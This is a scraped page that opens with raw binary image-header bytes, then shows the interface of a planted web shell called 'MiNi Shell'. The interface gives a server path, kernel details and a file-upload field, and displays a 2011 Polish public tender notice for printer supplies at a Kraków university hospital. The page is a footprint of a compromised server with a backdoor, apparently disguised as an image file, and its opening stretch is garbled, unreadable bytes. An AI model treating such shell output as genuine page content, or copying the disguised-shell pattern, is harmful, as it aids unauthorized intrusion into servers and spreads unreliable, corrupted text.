JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110307/75401-N-2011.html

<p class="kh_header"><b>Kraków: Dostawa materiałów eksploatacyjnych do drukarek i faksów</b><br>
<b>Numer ogłoszenia: 75401 - 2011; data zamieszczenia: 07.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Uniwersytecki  w Krakowie , ul. Kopernika 19, 31-501 Kraków, woj. małopolskie, tel. 012 424 71 21,012 424 70 46, faks 012 424 71 22, 012 424 71 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.su.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek i faksów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.CARTRIDGE CANON PG 40 CZARNY-Ilość szt-12;
2.CARTRIDGE CANON BC-20-Ilość szt-8;
3.CARTRIDGE CANON PG 15 BK IP 4200 BLACK-Ilość szt-4;
4.CARTRIDGE CANON CL18MC IP 4200 KOLOR-Ilość szt-4;
5.TONER CANON NP. 1010-Ilość szt-6;
6.TONER CANON 2900 CRG 703-Ilość szt-4;
7.TONER CANON 1018 C-EXV18-Ilość szt-8;
8.TONER CANON FX10 L 100/120 DO 4150-Ilość szt-8;
9.CARTRIDGE HP 4780 CZARNY CC641EE-Ilość szt-6;
10.CARTRIDGE HP 4780 KOLOR CC644EE-Ilość szt-2;
11.CARTRIDGE HP C6656+C6657-Ilość szt-2;
12.TONER HP LJ 1215 CZARNY CB 540BK-Ilość szt-2;
13.TONER HP LJ C4182X-Ilość szt-8;
14.TONER HP Q 6000A-Ilość szt-2;
15.TONER HP Q 6001A-Ilość szt-2;
16.TONER HP Q 6002A-Ilość szt-2;
17.TONER HP Q 6003A-Ilość szt-2;
18.TONER HP CC530 CM2320	-Ilość szt-4;
19.TONER  CM 2320 CC531-Ilość szt-4;
20.TONER  CM 2320 CC532-Ilość szt-4;
21.TONER  CM 2320 CC533-Ilość szt-4;
22.CARTRIDGE HP 338 czarny-Ilość szt-2;
23.CARTRIDGE HP C-1823D-Ilość szt-2;
24.CARTRIDGE HP 343 KOLOR-Ilość szt-2;
25.CARTRIDGE HP C9351A-Ilość szt-10;
26.CARTRIDGE HP C-51645A-Ilość szt-2;
27.CARTRIDGE HP C-6578D-Ilość szt-30;
28.CARTRIDGE HP C-6615D-Ilość szt-70;
29.CARTRIDGE HP C-6625A-Ilość szt-16;
30.CARTRIDGE HP C-6656A CZARNY-Ilość szt-60;
31.CARTRIDGE HP C-6657A-Ilość szt-16;
32.CARTRIDGE HP C-8727A CZARNY-Ilość szt-14;
33.CARTRIDGE HP C-8728A KOLOR-Ilość szt-8;
34.CARTRIDGE HP C8767 EE339 CZARNY-Ilość szt-14;
35.TONER HP 4092A-Ilość szt-52;
36.TONER HP LJ Q2670A CZARNY-Ilość szt-6;
37.TONER HP LJ Q2681A KOLOR-Ilość szt-2;
38.TONER HP LJ Q2682A KOLOR-Ilość szt-2;
39.TONER HP LJ Q2683A KOLOR-Ilość szt-2;
40.TONER HP LJ C4096A-Ilość szt-12;
41.TONER HP LJ Q2612A-Ilość szt-380;
42.TONER HP LJ C7115A-Ilość szt-150;
43.TONER HP Q2610 CZARNY-Ilość szt-10;
44.TONER HP Q2613 CZARNY-Ilość szt-24;
45.TONER HP Q5949A-Ilość szt-80;
46.TONER HP 92274-Ilość szt-2;
47.TONER HP 3906-Ilość szt-10;
48.TONER HP LJ P 4015, CCC364X-Ilość szt-2;
49.TONER HP CE505X LJ 2055-Ilość szt-40;
50.TONER HP LJ CB 436-Ilość szt-40;
51.TONER HP LJ CB 435-Ilość szt-180;
52.TONER HP LJ 3500/3550 CZARNY-Ilość szt-6;
53.TONER HP LJ 3500/3550 KOLOR-Ilość szt-6;
54.TONER HP LJ Q1338A-Ilość szt-4;
55.TONER HP COLOR LJ Q6470A-Ilość szt-8;
56.TONER HP COLOR LJ Q7581A-Ilość szt-4;
57.TONER HP COLOR LJ Q7582A-Ilość szt-4;
58.TONER HP COLOR LJ Q7583A-Ilość szt-4;
59.TONER HP LJ P 2015X-Ilość szt-40;
60.TUSZ EPSON T 0801-Ilość szt-2;
61.TAŚMA EPSON LQ 100-Ilość szt-10;
62.TONER EPSON EPL 6200-Ilość szt-8;
63.TONER LEXMARK  SC1275 BLACK na  4.500 kopii-Ilość szt-2;
64.TONER LEXMARK SC 1275 CYAN na 3.500 kopii-Ilość szt-2;
65.TONER LEXMARK  C 540H1 YELLOW n 4.000 kopii-Ilość szt-2;
66.TONER LEXMARK C 540 MAGENTA na 4.000 kopii-Ilość szt-2;
67.TONER LEXMARK  C 540 BLACK na 6.000 kopii-Ilość szt-2;
68.TONER LEXMARK  C 540 CYAN na 4. 000 kopii-Ilość szt-2;
69.TONER LEXMARK E 260-Ilość szt-100;
70.TONER LEXMARK E 220-Ilość szt-2;
71.CARTRIDGE LEXMARK 12A1970 CZARNY-Ilość szt-2;
72.TONER OKI C 5650/C 5750 - czarny-Ilość szt-12;
73.TONER OKI C 5650/C 5751 - kolory-Ilość szt-8;
74.TONER OKI C3100 CYAN-Ilość szt-4;
75.TONER OKI C3100 MAGENTA-Ilość szt-4;
76.TONER OKI C3100 YELLOW-Ilość szt-4;
77.TONER OKI C3100 CZARNY TYP-C6L-Ilość szt-4;
78.TONER OKI B 6300 CZARNY-Ilość szt-50;
79.TONER OKI B 410-Ilość szt-2;
80.TAŚMA OKI 3320-Ilość szt-130;
81.TAŚMA OKI 3390-Ilość szt-50;
82.TONER KYOCERA MITA 1635-Ilość szt-3;
83.TONER KYOCERA TK-18-Ilość szt-26;
84.TONER KYOCERA TK-17-Ilość szt-4;
85.TONER KYOCERA TK 310-Ilość szt-2;
86.TONER TOSHIBA 1550 (K)	-Ilość szt-2;
87.TONER TOSHIBA T 1640 E, E-STUDIO 163/166-Ilość szt-2;
88.TONER TOSHIBA 2060-Ilość szt-4;
89.TONER XEROX 6180 czarny na 8,000 kopii, kolory na 6,000 kopii-Ilość szt-4;
90.TONER XEROX PHASER 3600 N-Ilość szt-2;
91.TONER SAMSUNG D1052L CZARNY-Ilość szt-8;
92.TONER SAMSUNG CLP-315 - 4092 Kolory-Ilość szt-14;
93.TONER  SAMSUNG CLT-K4092 S BLACK-Ilość szt-6;
94.TONER SAMSUNG ML 1640/2240 - 1082-Ilość szt-100;
95.TONER SAMSUNG SCX 4720 D5-Ilość szt-6;
96.TONER SAMSUNG MLT-D 2092L-Ilość szt-4;
97.TONER SAMSUNG SCX 4300, 1092-Ilość szt-4;
98.TONER  SAMSUNG 2010-Ilość szt-6;
99.TONER MINOLTA MC 2300 CZARNY na 4.500 kopii-Ilość szt-10;
100.TONER MINOLTA MC 2300 NIEBIESKI na 4.500 kopii-Ilość szt-3;
101.TONER MINOLTA MC 2300 ŻÓŁTY na 4.500 kopii-Ilość szt-3;
102.TONER MINOLTA MC 2300 CZERWONY na 4.500 kopii-Ilość szt-15;
103.TONER BROTHER TN 2005-Ilość szt-2;
104.TONER BROTHER TN 2120 CZ.-Ilość szt-8;
105.TONER RICOH TYP 1220AF-Ilość szt-4;
106.TONER BROTHER TN 2000-Ilość szt-2;
107.TONER DO PHASER 3428-Ilość szt-50;
108.TONER PANASONIC KX FA 83-Ilość szt-6;
109.TONER MINOLTA 1200 W/1250-Ilość szt-4;
110.TAŚMA PANASONIC KXP160-Ilość szt-150;
111.TAŚMA MASZYNOWA 13-Ilość szt-20;
112.TAŚMA MASZYNOWA 16	-Ilość szt-10;
113.TAŚMA DL 3700/DL3800-Ilość szt-8;
114.TAŚMA PANASONIC KXP 1150-Ilość szt-6;
115.TAŚMA  LQ  100/LX100-Ilość szt-10;
116. FILM PANASONIC /FAX/ KX-FP 218/207-Ilość szt-80;
117. FILM PANASONIC /FAX/ KX-FA 55-Ilość szt-8.
Zamawiający dopuszcza zaoferowanie materiałów eksploatacyjnych równoważnych, tzw. zamienników..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wynosi 3 500,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dotyczy wykonawców oferujących materiały równoważne: zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające, że oferowane materiały odpowiadają normom ISO/IEC 19752 (drukarki laserowe monochromatyczne), ISO/IEC 19798 (drukarki laserowe kolorowe) oraz ISO/IEC 24711 i ISO/IEC 24712 (drukarki atramentowe)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty, sporządzony według wzoru stanowiącego załącznik nr 1 do specyfikacji.
2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy arkusz cenowy, sporządzony według wzoru stanowiącego załącznik nr 3 do specyfikacji. Prosimy również o dołączenie załącznika 3 (wypełnionego) w formie elektronicznej na płycie CD.
4. Kserokopia dowodu wniesienia wadium w przypadku wpłaty przelewem.
5. Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: www.soldea.pl</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>reguluje wzór umowy (załącznik nr 4 do specyfikacji)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.su.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Uniwersytecki w Krakowie, Dział Zamówień Publicznych, ul. Kopernika 19, 31-501 Kraków - odpłatnie (9,74 zł) lub bezpłatnie ze strony internetowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 12:00, miejsce: Szpital Uniwersytecki w Krakowie, Dział Zamówień Publicznych, ul. Kopernika 19, 31-501 Kraków - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com